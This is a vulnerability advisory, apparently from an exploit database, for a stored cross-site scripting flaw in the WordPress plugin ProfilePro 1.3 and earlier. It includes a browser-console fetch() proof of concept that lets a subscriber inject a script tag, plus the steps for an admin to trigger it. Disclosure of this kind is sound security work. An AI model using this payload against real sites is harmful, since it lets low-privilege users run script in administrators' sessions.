WordPress Profilepro 1.3 Cross Site Scripting

2024.08.14
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting # Date: 15-04-2024 # Exploit Author: Vuln Seeker Cybersecurity Team # Vendor Homepage: https://wordpress.org/plugins/profilepro/ # Version: <= 1.3 # Tested on: Firefox # Contact me: vulns@vulnseeker.org Description The plugin does not sanitise and escape some parameters and lacks proper access controls, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks Proof of Concept Run the following code from the browser console from the subscriber user ``` fetch("../wp-admin/admin-ajax.php", { method: "POST", headers: { "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest" }, body: "title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89", credentials: "include" }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.text(); }) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` - As an admin, go to http://example.com/wp-admin/edit.php?post_type=profilepro_form - Choose the default profile, click on edit and click on add field, XSS will pop up. Reference: https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top